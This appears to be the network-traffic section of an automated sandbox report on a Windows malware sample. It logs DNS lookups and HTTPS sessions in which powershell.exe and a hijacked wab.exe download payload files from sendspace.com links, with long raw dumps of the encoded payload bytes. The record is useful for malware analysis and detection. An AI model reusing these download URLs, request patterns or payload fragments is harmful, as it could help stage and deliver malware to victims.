                                        May 23, 2024 18:25:49.038697958 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.038738966 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039589882 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039622068 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039653063 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039659023 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039675951 CEST4434971469.31.136.17192.168.2.5
                                        May 23, 2024 18:25:49.039676905 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039697886 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039721012 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039870024 CEST49714443192.168.2.569.31.136.17
                                        May 23, 2024 18:25:49.039885998 CEST4434971469.31.136.17192.168.2.5

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 23, 2024 18:25:05.356702089 CEST5177553192.168.2.51.1.1.1
                                        May 23, 2024 18:25:05.368858099 CEST53517751.1.1.1192.168.2.5
                                        May 23, 2024 18:25:06.155648947 CEST5861853192.168.2.51.1.1.1
                                        May 23, 2024 18:25:06.190654039 CEST53586181.1.1.1192.168.2.5
                                        May 23, 2024 18:25:47.225666046 CEST5086853192.168.2.51.1.1.1
                                        May 23, 2024 18:25:47.247318983 CEST53508681.1.1.1192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        May 23, 2024 18:25:05.356702089 CEST192.168.2.51.1.1.10x7cb0Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                        May 23, 2024 18:25:06.155648947 CEST192.168.2.51.1.1.10xa42bStandard query (0)fs13n1.sendspace.comA (IP address)IN (0x0001)false
                                        May 23, 2024 18:25:47.225666046 CEST192.168.2.51.1.1.10x6de0Standard query (0)fs03n2.sendspace.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        May 23, 2024 18:25:05.368858099 CEST1.1.1.1192.168.2.50x7cb0No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                        May 23, 2024 18:25:05.368858099 CEST1.1.1.1192.168.2.50x7cb0No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                        May 23, 2024 18:25:06.190654039 CEST1.1.1.1192.168.2.50xa42bNo error (0)fs13n1.sendspace.com69.31.136.57A (IP address)IN (0x0001)false
                                        May 23, 2024 18:25:47.247318983 CEST1.1.1.1192.168.2.50x6de0No error (0)fs03n2.sendspace.com69.31.136.17A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.sendspace.com
                                        • fs13n1.sendspace.com
                                        • fs03n2.sendspace.com

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549704104.21.28.804431988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-05-23 16:25:05 UTC174OUTGET /pro/dl/7dhid7 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: www.sendspace.com
                                        Connection: Keep-Alive
                                        2024-05-23 16:25:06 UTC946INHTTP/1.1 301 Moved Permanently
                                        Date: Thu, 23 May 2024 16:25:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: SID=u0as7mg90cv48ga5n1g7rvv7f0; path=/; domain=.sendspace.com
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Pragma: no-cache
                                        Location: https://fs13n1.sendspace.com/dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDi5H1cm7jX4gBHMn04sd2%2BoEaORZ49uL3UwcdjAFi4xNEpQcJOCe66ZKu5enXprmmfXguT%2BhfPsHs58TF%2BYsbtB7%2BE58DTPuhTTgKLAZ1vJmDiThtPcX%2Fp1%2FcAiT2ErIUk6pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 888666645a91c445-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-05-23 16:25:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.54970569.31.136.574431988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-05-23 16:25:06 UTC231OUTGET /dlpro/008892344a2eed7a827a87fc8083ccb1/664f6de2/7dhid7/Castrate.xtp HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: fs13n1.sendspace.com
                                        Connection: Keep-Alive
                                        2024-05-23 16:25:07 UTC497INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Thu, 23 May 2024 16:25:06 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 412172
                                        Last-Modified: Wed, 15 May 2024 07:37:51 GMT
                                        Connection: close
                                        Set-Cookie: SID=26gkib6ma0o7nhfe3go65aodf3; path=/; domain=.sendspace.com
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: attachment;filename="Castrate.xtp"
                                        ETag: "6644664f-64a0c"
                                        Accept-Ranges: bytes
                                        2024-05-23 16:25:07 UTC15887INData Raw: 36 77 4b 49 47 75 73 43 47 32 4b 37 58 71 45 50 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 6f 66 68 43 44 75 73 43 65 5a 64 78 41 5a 75 42 38 63 6a 47 58 71 74 78 41 5a 74 78 41 5a 75 42 36 57 6b 2b 48 4b 58 72 41 6c 37 52 36 77 4c 6e 67 6e 45 42 6d 2b 73 43 73 69 71 36 75 6a 30 65 34 33 45 42 6d 2b 73 43 32 75 78 78 41 5a 76 72 41 71 34 72 4d 63 72 72 41 71 7a 31 63 51 47 62 69 52 51 4c 36 77 4b 64 6f 65 73 43 4a 58 33 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 4f 73 43 36 73 56 78 41 5a 75 42 2b 57 49 52 30 77 46 38 79 2b 73 43 43 66 7a 72 41 6f 62 6a 69 30 51 6b 42 4f 73 43 71 6e 35 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 4c 46 57 42 77 39 61 4d 47 67 48 72 41 70 53 5a 63 51 47 62 75 70 6f 32 79 4d 7a 72 41 73 36 2b 63 51 47
                                        Data Ascii: 6wKIGusCG2K7XqEPAHEBm3EBmwNcJARxAZtxAZu5ofhCDusCeZdxAZuB8cjGXqtxAZtxAZuB6Wk+HKXrAl7R6wLngnEBm+sCsiq6uj0e43EBm+sC2uxxAZvrAq4rMcrrAqz1cQGbiRQL6wKdoesCJX3R4nEBm3EBm4PBBOsC6sVxAZuB+WIR0wF8y+sCCfzrAobji0QkBOsCqn5xAZuJw3EBm+sCLFWBw9aMGgHrApSZcQGbupo2yMzrAs6+cQG
                                        2024-05-23 16:25:07 UTC16384INData Raw: 37 39 76 50 45 6c 4f 35 36 6e 78 31 7a 4c 4a 77 4e 39 43 4f 64 48 58 4d 6a 7a 4e 67 45 5a 53 54 79 63 72 43 61 34 44 44 58 59 74 56 2b 78 79 59 4d 6c 65 34 4f 45 72 51 59 49 52 31 7a 49 35 30 64 45 4a 36 30 58 77 7a 53 6e 67 71 7a 4d 57 55 72 39 37 43 44 35 52 76 69 52 56 50 6e 31 52 57 7a 50 6e 36 42 4c 73 32 61 6d 30 7a 2b 42 78 7a 75 77 56 36 4d 42 2f 4c 49 68 37 6e 4f 76 78 7a 65 42 69 74 38 44 79 44 51 6b 74 70 45 49 35 30 64 63 79 50 79 4a 70 42 4e 73 79 46 6a 2f 2f 6a 6d 2b 6a 53 72 47 31 6c 62 70 65 7a 63 79 61 63 4f 35 66 65 2f 47 76 41 69 65 41 6a 34 76 73 51 66 63 79 50 4c 6f 33 37 71 4b 58 6e 79 31 64 54 33 39 59 41 63 36 78 71 70 77 5a 44 79 35 55 35 4b 34 70 62 4f 67 66 72 41 6e 43 37 75 70 31 5a 6d 63 63 63 6d 4e 79 47 51 6a 42 45 72 74 41
                                        Data Ascii: 79vPElO56nx1zLJwN9COdHXMjzNgEZSTycrCa4DDXYtV+xyYMle4OErQYIR1zI50dEJ60XwzSngqzMWUr97CD5RviRVPn1RWzPn6BLs2am0z+BxzuwV6MB/LIh7nOvxzeBit8DyDQktpEI50dcyPyJpBNsyFj//jm+jSrG1lbpezcyacO5fe/GvAieAj4vsQfcyPLo37qKXny1dT39YAc6xqpwZDy5U5K4pbOgfrAnC7up1ZmcccmNyGQjBErtA
                                        2024-05-23 16:25:07 UTC16384INData Raw: 55 51 4e 39 52 77 35 62 42 4c 6f 6c 55 33 67 64 36 62 4a 31 50 31 30 55 4c 54 51 48 6c 63 6d 37 31 59 77 42 33 37 41 55 6a 51 35 50 46 2b 38 4b 48 38 30 7a 70 39 71 7a 76 42 77 68 65 30 70 52 43 62 4b 4a 76 57 6e 45 52 4c 52 4a 79 46 52 51 64 63 79 4f 64 48 51 6b 34 33 79 43 47 50 7a 77 61 63 6a 38 72 70 73 7a 50 74 65 5a 63 45 4b 7a 6a 67 4a 39 4b 6e 73 33 66 4d 75 31 57 66 34 30 44 69 50 6b 58 4a 63 71 76 46 32 57 51 6f 6c 2f 53 5a 55 52 52 54 73 67 62 31 74 79 74 6f 6d 37 38 36 69 56 74 6e 49 43 78 75 6a 45 38 6f 6d 35 57 68 38 6a 38 54 2b 2b 71 66 78 78 70 76 71 54 44 41 44 6c 59 4c 38 42 5a 58 6d 42 34 51 45 47 65 35 62 53 65 68 6e 4a 43 2b 4e 4b 64 30 6b 74 6a 6a 6b 67 39 66 74 2b 68 6d 56 33 6c 74 4d 4b 62 6b 37 2f 4f 64 72 52 71 43 4a 6d 71 65 52
                                        Data Ascii: UQN9Rw5bBLolU3gd6bJ1P10ULTQHlcm71YwB37AUjQ5PF+8KH80zp9qzvBwhe0pRCbKJvWnERLRJyFRQdcyOdHQk43yCGPzwacj8rpszPteZcEKzjgJ9Kns3fMu1Wf40DiPkXJcqvF2WQol/SZURRTsgb1tytom786iVtnICxujE8om5Wh8j8T++qfxxpvqTDADlYL8BZXmB4QEGe5bSehnJC+NKd0ktjjkg9ft+hmV3ltMKbk7/OdrRqCJmqeR
                                        2024-05-23 16:25:07 UTC16384INData Raw: 55 70 45 4a 59 54 2b 2b 71 66 78 52 70 76 76 73 6b 75 56 79 50 47 4d 77 71 67 66 4d 35 4a 4d 68 32 53 6c 49 33 51 39 67 69 62 6d 59 41 4e 73 6c 76 6a 6b 58 31 35 41 57 72 47 64 30 70 63 53 65 68 63 79 4f 64 6e 49 6e 53 65 74 30 46 4c 42 43 69 33 79 43 64 52 79 69 71 57 74 47 38 45 4b 2f 6f 6e 74 67 4e 37 42 64 4c 55 59 2b 73 32 61 62 65 73 66 64 4b 36 66 53 66 35 61 66 55 37 68 59 71 6e 44 47 46 4e 4f 6f 78 32 39 75 62 4c 34 79 58 44 56 70 6b 53 6e 77 69 56 58 4a 7a 49 35 30 64 63 30 5a 53 41 32 70 4e 6c 38 6d 70 59 56 73 68 71 53 70 79 2b 58 5a 59 53 59 4d 6f 2b 5a 41 41 33 66 44 7a 2f 5a 31 75 6d 79 4e 48 6d 37 59 55 37 4b 67 67 31 58 49 6a 6e 58 74 38 35 4b 34 64 63 79 4f 64 48 52 31 62 66 57 4b 79 6d 36 6d 77 30 57 44 2b 5a 76 61 6f 5a 30 2f 61 76 6c
                                        Data Ascii: UpEJYT++qfxRpvvskuVyPGMwqgfM5JMh2SlI3Q9gibmYANslvjkX15AWrGd0pcSehcyOdnInSet0FLBCi3yCdRyiqWtG8EK/ontgN7BdLUY+s2abesfdK6fSf5afU7hYqnDGFNOox29ubL4yXDVpkSnwiVXJzI50dc0ZSA2pNl8mpYVshqSpy+XZYSYMo+ZAA3fDz/Z1umyNHm7YU7Kgg1XIjnXt85K4dcyOdHR1bfWKym6mw0WD+ZvaoZ0/avl
                                        2024-05-23 16:25:07 UTC16384INData Raw: 64 6b 46 6d 61 63 76 4b 57 79 52 39 7a 49 34 52 7a 64 31 64 71 33 42 72 5a 6b 43 58 79 6c 73 6b 66 63 79 4f 6c 30 42 47 32 47 63 32 45 35 55 49 71 76 67 6e 63 34 76 35 33 6e 78 31 7a 56 6d 70 37 39 76 44 63 32 6e 4c 42 51 4a 59 57 52 52 6a 55 53 39 38 63 4e 4a 75 4b 78 6e 66 79 43 6a 64 41 33 64 30 63 4c 49 50 53 72 72 48 79 6e 6a 45 64 63 79 4e 2f 48 58 4d 6a 6b 70 6b 34 7a 32 4c 69 53 2b 4a 61 6d 49 41 69 6e 52 30 6c 64 6d 47 54 53 76 75 6c 7a 66 4b 6d 62 68 78 7a 49 37 6b 78 6c 69 51 63 71 49 41 69 6e 52 32 4f 5a 32 49 2f 38 71 5a 75 48 48 4d 6a 34 53 65 53 61 50 73 6b 75 4b 4e 68 44 7a 4c 63 45 4f 35 79 49 35 31 6f 68 47 49 59 33 37 51 69 33 4e 34 67 74 42 77 30 30 79 73 73 73 66 49 4b 49 78 43 6b 34 68 77 73 36 66 54 2f 6f 76 4a 65 31 66 7a 37 49 35
                                        Data Ascii: dkFmacvKWyR9zI4Rzd1dq3BrZkCXylskfcyOl0BG2Gc2E5UIqvgnc4v53nx1zVmp79vDc2nLBQJYWRRjUS98cNJuKxnfyCjdA3d0cLIPSrrHynjEdcyN/HXMjkpk4z2LiS+JamIAinR0ldmGTSvulzfKmbhxzI7kxliQcqIAinR2OZ2I/8qZuHHMj4SeSaPskuKNhDzLcEO5yI51ohGIY37Qi3N4gtBw00ysssfIKIxCk4hws6fT/ovJe1fz7I5
                                        2024-05-23 16:25:07 UTC16384INData Raw: 74 37 38 71 4f 54 4d 70 39 66 5a 6b 49 6f 47 51 41 66 4b 64 78 55 58 41 6a 78 4a 79 45 57 61 2f 50 32 71 4a 71 78 54 72 52 72 52 79 49 71 43 41 37 63 53 4f 64 65 30 72 37 57 68 35 76 57 46 77 34 38 74 6f 50 4c 69 6f 70 48 43 34 35 5a 52 43 63 6d 47 63 4e 2b 45 4e 6a 56 38 55 71 57 6d 79 4f 41 55 66 38 58 42 42 4e 44 42 78 4e 53 2f 59 7a 30 47 74 46 6f 44 6f 41 32 30 34 6e 42 42 76 42 34 38 61 74 58 62 6e 37 78 47 53 43 73 4f 39 35 45 6d 4c 2b 63 2b 49 69 6f 33 55 59 44 54 35 56 71 35 37 55 50 6a 56 77 79 54 72 31 2f 78 77 75 77 4b 53 4f 75 79 57 64 72 37 4d 59 4a 68 7a 6a 30 79 4f 64 48 58 79 74 2b 56 46 77 49 38 4f 63 63 42 35 36 66 72 49 62 63 5a 79 77 34 52 4c 5a 63 71 4a 32 6f 2f 7a 6e 6e 43 57 63 35 4a 34 30 32 56 63 78 6e 41 35 66 6e 5a 4e 7a 49 35
                                        Data Ascii: t78qOTMp9fZkIoGQAfKdxUXAjxJyEWa/P2qJqxTrRrRyIqCA7cSOde0r7Wh5vWFw48toPLiopHC45ZRCcmGcN+ENjV8UqWmyOAUf8XBBNDBxNS/Yz0GtFoDoA204nBBvB48atXbn7xGSCsO95EmL+c+Iio3UYDT5Vq57UPjVwyTr1/xwuwKSOuyWdr7MYJhzj0yOdHXyt+VFwI8OccB56frIbcZyw4RLZcqJ2o/znnCWc5J402VcxnA5fnZNzI5
                                        2024-05-23 16:25:07 UTC16384INData Raw: 6b 2b 4c 36 48 48 33 4d 6a 7a 61 56 6a 4f 6e 49 51 58 6c 42 74 49 56 38 4f 46 4e 77 65 6e 61 67 4a 46 57 65 2b 53 2b 2b 71 65 78 52 31 76 68 6a 50 44 53 77 51 53 69 45 42 76 75 6f 68 66 6d 4a 58 55 4a 2f 79 71 64 38 6b 39 62 75 2b 47 33 46 44 68 4f 52 6e 4d 72 45 69 78 52 4a 7a 4d 68 45 64 63 79 4f 64 48 52 54 6c 43 4b 68 4d 33 73 37 63 2f 4f 77 37 74 35 6a 68 51 56 33 67 51 6b 35 57 6e 6d 74 52 46 66 4e 76 64 65 53 66 62 49 7a 55 55 6b 7a 6c 74 48 58 64 59 6d 74 6a 71 4d 67 39 63 48 57 4a 6c 4d 37 30 6e 42 31 7a 71 6b 70 4b 2b 4a 35 4b 48 48 4d 6a 6b 68 78 43 4b 5a 30 64 63 79 4f 64 54 4b 4c 4f 34 6d 4b 38 71 44 69 6b 75 53 76 74 4a 47 43 34 48 30 72 4d 6b 35 4a 2f 57 36 4a 61 4e 35 39 46 4b 5a 79 45 2f 45 7a 2f 45 4b 4a 71 64 76 74 67 48 4a 79 63 54 54
                                        Data Ascii: k+L6HH3MjzaVjOnIQXlBtIV8OFNwenagJFWe+S++qexR1vhjPDSwQSiEBvuohfmJXUJ/yqd8k9bu+G3FDhORnMrEixRJzMhEdcyOdHRTlCKhM3s7c/Ow7t5jhQV3gQk5WnmtRFfNvdeSfbIzUUkzltHXdYmtjqMg9cHWJlM70nB1zqkpK+J5KHHMjkhxCKZ0dcyOdTKLO4mK8qDikuSvtJGC4H0rMk5J/W6JaN59FKZyE/Ez/EKJqdvtgHJycTT
                                        2024-05-23 16:25:07 UTC16384INData Raw: 39 4f 78 70 46 6e 4c 4b 56 61 41 33 4d 6f 6c 77 34 4e 61 39 45 54 4d 6f 41 47 61 41 61 6f 6d 53 53 63 79 4f 64 45 76 66 2b 63 52 39 7a 65 68 7a 73 41 76 78 67 2f 66 66 71 61 39 6d 4c 70 32 4a 63 4d 36 6f 51 58 48 45 6a 6e 61 54 51 33 51 6a 79 46 61 4a 6b 30 4f 79 69 62 4a 42 63 78 2f 69 63 44 6d 73 38 47 33 4d 6a 6b 70 6b 52 58 5a 30 64 38 74 49 64 35 5a 6e 79 70 64 35 4c 78 42 7a 73 33 51 6f 47 52 76 66 67 70 52 58 34 72 74 77 66 63 79 4f 53 6d 52 33 63 59 75 4c 37 72 76 51 66 63 79 4d 58 46 66 50 61 76 35 66 2b 53 70 38 64 63 31 59 37 58 62 55 6a 6b 70 79 4e 42 52 57 64 59 36 4f 74 44 55 76 45 2b 35 69 70 6f 35 31 2f 38 79 50 69 65 30 72 72 70 64 2b 77 6f 75 42 68 47 52 75 64 48 58 79 73 6b 6c 6d 4d 33 4b 58 34 46 52 37 65 58 34 58 6d 68 5a 32 4a 71 78
                                        Data Ascii: 9OxpFnLKVaA3Molw4Na9ETMoAGaAaomSScyOdEvf+cR9zehzsAvxg/ffqa9mLp2JcM6oQXHEjnaTQ3QjyFaJk0OyibJBcx/icDms8G3MjkpkRXZ0d8tId5Znypd5LxBzs3QoGRvfgpRX4rtwfcyOSmR3cYuL7rvQfcyMXFfPav5f+Sp8dc1Y7XbUjkpyNBRWdY6OtDUvE+5ipo51/8yPie0rrpd+wouBhGRudHXysklmM3KX4FR7eX4XmhZ2Jqx
                                        2024-05-23 16:25:07 UTC16384INData Raw: 55 56 59 70 49 54 54 30 63 5a 78 6e 4e 66 57 6a 32 6c 6d 6d 33 2f 42 61 33 4a 4e 4f 6b 30 52 37 52 34 7a 48 75 4a 2b 66 44 76 37 34 49 4f 4b 7a 78 56 48 42 78 4b 4b 6e 58 6b 76 51 70 30 45 69 66 51 45 63 5a 35 6e 75 50 79 4b 79 58 66 2b 68 36 6b 36 50 62 47 68 61 56 43 4a 50 66 43 37 56 44 63 73 67 63 37 4d 37 47 2f 51 2f 79 30 76 4c 72 44 5a 75 53 48 57 4c 55 6e 52 31 7a 49 35 31 62 5a 68 4f 49 6b 2f 4c 53 67 64 6d 66 43 73 36 6d 39 50 33 71 68 76 4c 51 53 32 42 50 4d 42 7a 32 49 6f 48 57 6c 53 53 2f 46 50 70 79 50 41 42 37 53 76 72 76 44 58 30 4a 7a 53 67 6b 42 38 4a 4c 78 2f 6d 78 61 53 57 47 2f 32 79 31 75 79 70 31 2b 75 2f 6f 77 63 48 2f 54 49 41 6b 6e 4f 63 77 4f 30 49 65 34 6d 55 73 45 56 62 50 49 5a 31 43 4c 45 57 6b 7a 53 68 79 46 70 41 69 49 5a
                                        Data Ascii: UVYpITT0cZxnNfWj2lmm3/Ba3JNOk0R7R4zHuJ+fDv74IOKzxVHBxKKnXkvQp0EifQEcZ5nuPyKyXf+h6k6PbGhaVCJPfC7VDcsgc7M7G/Q/y0vLrDZuSHWLUnR1zI51bZhOIk/LSgdmfCs6m9P3qhvLQS2BPMBz2IoHWlSS/FPpyPAB7SvrvDX0JzSgkB8JLx/mxaSWG/2y1uyp1+u/owcH/TIAknOcwO0Ie4mUsEVbPIZ1CLEWkzShyFpAiIZ
                                        2024-05-23 16:25:07 UTC16384INData Raw: 47 2b 46 36 39 34 73 59 76 6e 42 31 7a 33 4f 68 64 6d 38 34 52 48 33 50 63 4b 42 56 79 49 35 31 4e 79 31 6a 49 48 4e 63 57 72 46 50 78 55 36 68 74 35 68 55 39 4b 50 48 47 64 34 31 47 37 37 68 43 6c 36 71 6c 6e 73 37 6c 76 50 79 36 59 74 76 56 50 4e 35 33 52 59 78 57 33 66 58 46 72 35 38 64 66 43 4b 4a 4f 58 4d 6a 6e 52 31 7a 52 51 39 76 52 2b 78 5a 61 7a 4f 78 55 78 36 54 70 2b 6e 70 30 64 2b 4d 4b 4c 6b 35 56 32 2f 67 37 45 67 71 4b 4d 41 39 63 4f 6d 64 75 7a 6c 57 6e 66 57 6d 4a 43 46 4c 45 6e 50 35 79 68 31 7a 49 35 30 64 45 69 63 31 62 4b 51 68 32 6d 34 4c 4b 48 69 36 43 63 41 63 72 30 46 49 2b 34 6d 68 73 70 35 72 51 36 54 7a 6a 65 4d 61 48 35 44 79 4a 37 6d 51 6f 2b 54 4e 6e 45 63 48 55 75 48 49 57 42 77 78 56 36 52 4a 62 43 37 63 4b 68 31 37 49 35
                                        Data Ascii: G+F694sYvnB1z3Ohdm84RH3PcKBVyI51Ny1jIHNcWrFPxU6ht5hU9KPHGd41G77hCl6qlns7lvPy6YtvVPN53RYxW3fXFr58dfCKJOXMjnR1zRQ9vR+xZazOxUx6Tp+np0d+MKLk5V2/g7EgqKMA9cOmduzlWnfWmJCFLEnP5yh1zI50dEic1bKQh2m4LKHi6CcAcr0FI+4mhsp5rQ6TzjeMaH5DyJ7mQo+TNnEcHUuHIWBwxV6RJbC7cKh17I5


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.549713104.21.28.804435964C:\Program Files (x86)\Windows Mail\wab.exe
                                        TimestampBytes transferredDirectionData
                                        2024-05-23 16:25:46 UTC175OUTGET /pro/dl/medjl1 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: www.sendspace.com
                                        Cache-Control: no-cache
                                        2024-05-23 16:25:47 UTC948INHTTP/1.1 301 Moved Permanently
                                        Date: Thu, 23 May 2024 16:25:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: SID=9rlcod4jutplauo2untp3jfqk6; path=/; domain=.sendspace.com
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Pragma: no-cache
                                        Location: https://fs03n2.sendspace.com/dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin
                                        Vary: Accept-Encoding
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2SnVxrw3kg6Tej9AF5vj%2BXrrtaiHdJXnPVi5sL1bBMxqTZJ6Tucn7IpUFZoFITq7NXk6IN1QRxBKUIt3moncK%2FHNDoBfwJREymb%2B3XyZ7r%2FaiONXBVbjLirySeWYJwNIehkJKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 888667648aa38c75-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-05-23 16:25:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.54971469.31.136.174435964C:\Program Files (x86)\Windows Mail\wab.exe
                                        TimestampBytes transferredDirectionData
                                        2024-05-23 16:25:48 UTC304OUTGET /dlpro/00d1105b5897edd15778b456a79f5e45/664f6e0b/medjl1/lLQuXHVIIjCqr119.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: fs03n2.sendspace.com
                                        Connection: Keep-Alive
                                        Cookie: SID=9rlcod4jutplauo2untp3jfqk6
                                        2024-05-23 16:25:48 UTC430INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Thu, 23 May 2024 16:25:48 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 536128
                                        Last-Modified: Wed, 15 May 2024 07:36:44 GMT
                                        Connection: close
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: attachment;filename="lLQuXHVIIjCqr119.bin"
                                        ETag: "6644660c-82e40"
                                        Accept-Ranges: bytes
                                        2024-05-23 16:25:48 UTC15954INData Raw: 02 d3 11 21 16 6f 1d d5 34 48 e5 fb c0 b1 d4 74 1a c8 82 fe 89 cb 5f ad ed a1 9c 67 0c 2b 00 fa 1b 44 b6 b8 91 e7 4d d7 1e 3f fc 71 c3 bd 4d 53 07 c2 ba fe ab a7 da 14 44 f9 7f ab 18 d7 f7 f7 85 ba 17 d2 e6 f3 22 37 92 26 0c c1 97 f4 aa bb 68 c4 23 18 13 9d 3e 1d 4d 39 90 e9 67 2a 3a 44 81 76 40 b9 48 5f f7 36 d4 ba 8b 09 7c 79 69 91 ca c5 85 50 ca d1 35 b7 ad 2d 12 fb 5c 25 c2 f9 72 05 ad 22 23 6d 2b 9a 62 f3 bb e3 8b 96 af f0 89 9e 93 c4 cd 07 1a 73 c1 ce f1 9e da 35 86 d0 cc d2 5f 7d bd b3 f3 e5 c0 51 c3 68 e6 cc ab 9e c9 41 f6 76 20 96 a5 b2 16 94 e6 db ce 51 79 f7 6f 21 cc d1 5a 56 b8 e3 fd 61 11 e6 72 89 69 35 9b bf 4c b9 f0 ad c7 ea 19 27 e4 b0 df ad 48 22 33 4b ab fa 37 1a 54 e4 1c 73 0a ee ee 24 88 cf 3f b2 69 3c 74 f8 42 9f 2d b0 4e 90 1a 96 91
                                        Data Ascii: !o4Ht_g+DM?qMSD"7&h#>M9g*:Dv@H_6|yiP5-\%r"#m+bs5_}QhAv Qyo!ZVari5L'H"3K7Ts$?i<tB-N
                                        2024-05-23 16:25:48 UTC16384INData Raw: d0 4f ff 71 2d 3a 63 de f3 7e 07 a1 8c 7a 71 b4 21 bb 14 9a e7 ca 19 63 24 b6 b4 af cc 6c e1 d2 d7 3b 29 da 14 9b 79 ad cf 6d 1f 5c 31 ef 17 a2 40 6e 1c a9 01 83 12 ba f2 e1 e8 37 66 72 87 f0 de b2 28 0b 76 93 7f 70 0b 2f 3d 59 e4 b3 73 b3 09 8a a7 6a c0 78 ea e1 d0 92 e0 bb 57 aa 7f 36 2f 02 35 b7 cd 18 28 a4 00 58 18 90 42 6a 31 b1 04 df 8d 08 94 2c 67 6f 7c 8f 25 db 5d 27 49 02 a9 5c 35 15 94 c3 53 d7 d8 dd 8c d6 91 c6 a6 d6 23 53 5b ba 4d f6 8e 87 65 ac 9f 2f bd 85 3e 73 e2 24 df 5a 64 57 52 d7 bc 38 8e 3c b8 eb cc 9d 99 d3 f4 e5 ce 45 00 ee ad 01 a9 34 8b 08 44 6b 3b 58 a8 d1 cf b6 f5 19 83 71 80 11 7a 2f d5 8f 7e 04 66 65 84 5c ba 26 d5 13 38 aa ee ac 13 51 b8 af c3 d9 2b fb e4 bf 61 3d 9f 73 fe d1 dc ab f4 95 62 46 42 b0 94 ca 29 10 bb 7b 28 d2 50
                                        Data Ascii: Oq-:c~zq!c$l;)ym\1@n7fr(vp/=YsjxW6/5(XBj1,go|%]'I\5S#S[Me/>s$ZdWR8<E4Dk;Xqz/~fe\&8Q+a=sbFB){(P
